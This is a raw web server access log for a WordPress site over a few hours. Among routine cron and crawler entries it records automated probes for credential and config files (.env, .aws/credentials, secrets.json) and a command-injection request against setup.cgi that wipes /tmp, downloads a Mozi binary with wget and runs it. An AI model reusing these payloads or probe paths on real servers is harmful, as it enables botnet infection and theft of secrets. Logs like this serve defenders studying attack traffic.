204.76.203.219 - - [04/Feb/2026:19:54:11 +0800] "GET / HTTP/1.1" 200 34754 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Feb/2026:19:57:40 +0800] "POST /wp-cron.php?doing_wp_cron=1770206260.8244299888610839843750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.18 - - [04/Feb/2026:19:57:40 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
204.76.203.18 - - [04/Feb/2026:19:57:44 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
204.76.203.18 - - [04/Feb/2026:19:57:47 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
204.76.203.18 - - [04/Feb/2026:19:57:50 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
204.76.203.18 - - [04/Feb/2026:19:57:53 +0800] "GET /backup/ HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [04/Feb/2026:20:05:14 +0800] "POST /wp-cron.php?doing_wp_cron=1770206714.4470179080963134765625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
89.42.231.200 - - [04/Feb/2026:20:05:14 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Feb/2026:20:09:30 +0800] "POST /wp-cron.php?doing_wp_cron=1770206970.0817780494689941406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
193.142.147.209 - - [04/Feb/2026:20:09:30 +0800] "POST / HTTP/1.1" 200 34753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [04/Feb/2026:20:18:49 +0800] "POST /wp-cron.php?doing_wp_cron=1770207529.5000650882720947265625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
87.121.84.51 - - [04/Feb/2026:20:18:49 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
185.213.174.141 - - [04/Feb/2026:20:47:47 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Feb/2026:20:51:54 +0800] "POST /wp-cron.php?doing_wp_cron=1770209514.4529740810394287109375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
129.159.107.159 - - [04/Feb/2026:20:51:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
36.133.115.36 - - [04/Feb/2026:20:52:55 +0800] "POST /wp-cron.php?doing_wp_cron=1770209575.3938560485839843750000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.154.250.181 - - [04/Feb/2026:20:52:55 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.154.250.181 - - [04/Feb/2026:20:52:57 +0800] "GET / HTTP/1.1" 200 34753 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Feb/2026:20:59:08 +0800] "POST /wp-cron.php?doing_wp_cron=1770209948.9189560413360595703125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.108.119 - - [04/Feb/2026:20:59:08 +0800] "HEAD /redmine/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36"
34.77.191.38 - - [04/Feb/2026:20:59:32 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
36.133.115.36 - - [04/Feb/2026:21:08:24 +0800] "POST /wp-cron.php?doing_wp_cron=1770210504.9063420295715332031250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
45.135.193.11 - - [04/Feb/2026:21:08:24 +0800] "GET /.env HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:27 +0800] "GET /.env.local HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:29 +0800] "GET /.env.staging HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:31 +0800] "GET /.env.development HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:33 +0800] "GET /.aws/credentials HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:35 +0800] "GET /config.json HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:36 +0800] "GET /config.yaml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:38 +0800] "GET /config.yml HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:39 +0800] "GET /settings.json HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:41 +0800] "GET /secrets.json HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:42 +0800] "GET /credentials.json HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:43 +0800] "GET /.env?import&raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:46 +0800] "GET /.env.local?import&raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:47 +0800] "GET /.env.staging?import&raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:51 +0800] "GET /.env.development?import&raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:52 +0800] "GET /.aws/credentials?import&raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:54 +0800] "GET /app/.env?import&raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:55 +0800] "GET /config.yaml?import&raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:57 +0800] "GET /config.yml?import&raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:08:59 +0800] "GET /settings.json?import&raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.135.193.11 - - [04/Feb/2026:21:09:01 +0800] "GET /credentials.json?import&raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [04/Feb/2026:21:12:59 +0800] "POST /wp-cron.php?doing_wp_cron=1770210779.9445118904113769531250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
139.135.44.46 - - [04/Feb/2026:21:12:59 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 31354 "-" "-"
36.133.115.36 - - [04/Feb/2026:21:22:53 +0800] "POST /wp-cron.php?doing_wp_cron=1770211373.0646860599517822265625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
74.7.175.191 - - [04/Feb/2026:21:22:53 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.243.213 - - [04/Feb/2026:21:22:54 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
36.133.115.36 - - [04/Feb/2026:21:27:28 +0800] "POST /wp-cron.php?doing_wp_cron=1770211648.8800730705261230468750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
110.249.201.43 - - [04/Feb/2026:21:27:28 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [04/Feb/2026:21:33:52 +0800] "POST /wp-cron.php?doing_wp_cron=1770212032.7887110710144042968750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
190.196.99.168 - - [04/Feb/2026:21:33:53 +0800] "GET / HTTP/1.1" 200 137349 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
36.133.115.36 - - [04/Feb/2026:21:37:20 +0800] "POST /wp-cron.php?doing_wp_cron=1770212240.0234639644622802734375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
3.135.238.197 - - [04/Feb/2026:21:37:20 +0800] "GET / HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
3.135.238.197 - - [04/Feb/2026:21:37:21 +0800] "GET / HTTP/1.1" 200 35185 "http://36.133.115.36" "Go-http-client/1.1"
36.133.115.36 - - [04/Feb/2026:21:38:31 +0800] "POST /wp-cron.php?doing_wp_cron=1770212311.3509259223937988281250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
35.187.253.23 - - [04/Feb/2026:21:38:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
35.187.253.23 - - [04/Feb/2026:21:38:31 +0800] "GET / HTTP/1.1" 200 35185 "http://36.133.115.36" "Go-http-client/1.1"
151.115.99.178 - - [04/Feb/2026:21:38:47 +0800] "HEAD / HTTP/1.1" 301 0 "-" "curl/7.81.0"
151.115.99.178 - - [04/Feb/2026:21:38:52 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3"
151.115.99.178 - - [04/Feb/2026:21:38:56 +0800] "GET / HTTP/1.1" 200 35185 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3"
151.115.99.178 - - [04/Feb/2026:21:39:02 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3"
36.133.115.36 - - [04/Feb/2026:21:39:58 +0800] "POST /wp-cron.php?doing_wp_cron=1770212397.9963469505310058593750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [04/Feb/2026:21:39:58 +0800] "GET / HTTP/1.1" 200 34753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Feb/2026:21:50:54 +0800] "POST /wp-cron.php?doing_wp_cron=1770213054.5050129890441894531250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
185.191.171.9 - - [04/Feb/2026:21:50:54 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.198 - - [04/Feb/2026:21:50:55 +0800] "GET /company-news/page/2/ HTTP/1.1" 200 21681 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [04/Feb/2026:21:54:25 +0800] "POST /wp-cron.php?doing_wp_cron=1770213265.3001370429992675781250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.108.119 - - [04/Feb/2026:21:54:25 +0800] "HEAD /app_nginx_static_path/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
36.133.115.36 - - [04/Feb/2026:22:09:58 +0800] "POST /wp-cron.php?doing_wp_cron=1770214198.8634469509124755859375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
101.33.81.73 - - [04/Feb/2026:22:09:58 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
101.33.81.73 - - [04/Feb/2026:22:10:00 +0800] "GET / HTTP/1.1" 200 34753 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.242.226.102 - - [04/Feb/2026:22:11:01 +0800] "GET / HTTP/1.1" 499 0 "-" "python-requests/2.26.0"
36.133.115.36 - - [04/Feb/2026:22:11:02 +0800] "POST /wp-cron.php?doing_wp_cron=1770214262.0306200981140136718750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.115.36 - - [04/Feb/2026:22:19:34 +0800] "POST /wp-cron.php?doing_wp_cron=1770214774.7405591011047363281250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
176.65.139.12 - - [04/Feb/2026:22:19:34 +0800] "GET / HTTP/1.1" 200 34754 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Feb/2026:22:31:20 +0800] "POST /wp-cron.php?doing_wp_cron=1770215480.3238270282745361328125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.108.119 - - [04/Feb/2026:22:31:20 +0800] "HEAD /docker/examples/compose/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
36.133.115.36 - - [04/Feb/2026:22:35:01 +0800] "POST /wp-cron.php?doing_wp_cron=1770215700.9872260093688964843750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
121.29.84.174 - - [04/Feb/2026:22:35:01 +0800] "GET / HTTP/1.1" 200 157284 "-" "-"
36.133.115.36 - - [04/Feb/2026:22:35:17 +0800] "POST /wp-cron.php?doing_wp_cron=1770215717.9285819530487060546875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
112.112.182.150 - - [04/Feb/2026:22:35:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
120.77.183.184 - - [04/Feb/2026:22:37:00 +0800] "GET /application/server/ueditor/upload/snaswup.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
36.133.115.36 - - [04/Feb/2026:22:37:57 +0800] "POST /wp-cron.php?doing_wp_cron=1770215877.4795660972595214843750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
64.227.88.50 - - [04/Feb/2026:22:37:57 +0800] "GET /.env HTTP/1.1" 404 8951 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
36.133.115.36 - - [04/Feb/2026:22:39:09 +0800] "POST /wp-cron.php?doing_wp_cron=1770215949.4169220924377441406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [04/Feb/2026:22:39:09 +0800] "GET / HTTP/1.1" 200 34753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.84.119.195 - - [04/Feb/2026:22:39:56 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Feb/2026:22:51:16 +0800] "POST /wp-cron.php?doing_wp_cron=1770216676.0650880336761474609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
167.94.138.51 - - [04/Feb/2026:22:51:16 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [04/Feb/2026:22:58:06 +0800] "POST /wp-cron.php?doing_wp_cron=1770217086.8342120647430419921875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
222.188.78.118 - - [04/Feb/2026:22:58:06 +0800] "GET / HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
222.188.78.118 - - [04/Feb/2026:22:58:07 +0800] "GET / HTTP/1.1" 200 35185 "http://36.133.115.36" "Go-http-client/1.1"
36.133.115.36 - - [04/Feb/2026:23:02:58 +0800] "POST /wp-cron.php?doing_wp_cron=1770217378.9105300903320312500000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
121.237.36.29 - - [04/Feb/2026:23:02:58 +0800] "GET / HTTP/1.1" 200 34753 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
36.133.115.36 - - [04/Feb/2026:23:03:08 +0800] "POST /wp-cron.php?doing_wp_cron=1770217388.6910769939422607421875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
121.237.36.27 - - [04/Feb/2026:23:03:08 +0800] "GET / HTTP/1.1" 301 5 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
121.237.36.29 - - [04/Feb/2026:23:03:12 +0800] "GET / HTTP/1.1" 301 5 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
36.133.115.36 - - [04/Feb/2026:23:09:00 +0800] "POST /wp-cron.php?doing_wp_cron=1770217740.0399839878082275390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
121.237.36.31 - - [04/Feb/2026:23:09:00 +0800] "GET / HTTP/1.1" 200 34753 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 MQQBrowser/8.6.1 Mobile/16A366 Safari/604.1"
47.114.89.255 - - [04/Feb/2026:23:23:12 +0800] "POST /myAdmin/file_image.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
36.133.115.36 - - [04/Feb/2026:23:24:40 +0800] "POST /wp-cron.php?doing_wp_cron=1770218680.3229510784149169921875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
193.142.147.209 - - [04/Feb/2026:23:24:41 +0800] "POST / HTTP/1.1" 200 34753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [04/Feb/2026:23:25:25 +0800] "POST /wp-cron.php?doing_wp_cron=1770218725.4273710250854492187500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
103.237.157.111 - - [04/Feb/2026:23:25:25 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 8951 "-" "Hello, World"
204.76.203.210 - - [04/Feb/2026:23:25:44 +0800] "GET /.env.development HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:25:45 +0800] "GET /.env.dev HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:25:46 +0800] "GET /.env.prod HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:25:47 +0800] "GET /.env.test HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:25:49 +0800] "GET /.env.old HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:25:53 +0800] "GET /.env.bak HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:25:58 +0800] "GET /.env~ HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:01 +0800] "GET /env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Feb/2026:23:26:08 +0800] "POST /wp-cron.php?doing_wp_cron=1770218768.3439290523529052734375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.210 - - [04/Feb/2026:23:26:08 +0800] "GET /src/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:09 +0800] "GET /backend/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:11 +0800] "GET /frontend/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:13 +0800] "GET /client/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:14 +0800] "GET /web/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:16 +0800] "GET /private/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:17 +0800] "GET /var/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:19 +0800] "GET /docker-compose.yml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
36.133.108.119 - - [04/Feb/2026:23:26:21 +0800] "HEAD /docker/compose/withMongo/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
204.76.203.210 - - [04/Feb/2026:23:26:23 +0800] "GET /docker-compose.override.yml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:25 +0800] "GET /docker-compose.dev.yml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:30 +0800] "GET /settings.json HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:33 +0800] "GET /secrets.json HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:53 +0800] "GET /settings.py HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:55 +0800] "GET /config.py HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:26:58 +0800] "GET /config/secrets.yml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:05 +0800] "GET /wp-config.php.txt HTTP/1.1" 301 5 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Feb/2026:23:27:08 +0800] "POST /wp-cron.php?doing_wp_cron=1770218828.6017398834228515625000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.210 - - [04/Feb/2026:23:27:08 +0800] "GET /wp-config.php~ HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:08 +0800] "GET /config/app.php HTTP/1.1" 404 27 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:10 +0800] "GET /application.yml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:11 +0800] "GET /application.yaml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:14 +0800] "GET /application-dev.properties HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:16 +0800] "GET /application-prod.properties HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:18 +0800] "GET /appsettings.json HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:21 +0800] "GET /config.yaml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:22 +0800] "GET /config.yml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:23 +0800] "GET /config.toml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:27 +0800] "GET /vercel.json HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:27 +0800] "GET /netlify.toml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:31 +0800] "GET /config/production.json HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:33 +0800] "GET /config/default.json HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:38 +0800] "GET /data/config.json HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:45 +0800] "GET /debug/vars HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:48 +0800] "GET /admin/config HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:49 +0800] "GET /api/settings HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:50 +0800] "GET /api/env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:51 +0800] "GET /.env.example HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:54 +0800] "GET /.env.sample HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:56 +0800] "GET /.env.dist HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:27:59 +0800] "GET /backup/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:28:00 +0800] "GET /backups/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:28:01 +0800] "GET /old/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:28:03 +0800] "GET /temp/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:28:04 +0800] "GET /tmp/.env HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:28:06 +0800] "GET /.streamlit/secrets.toml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
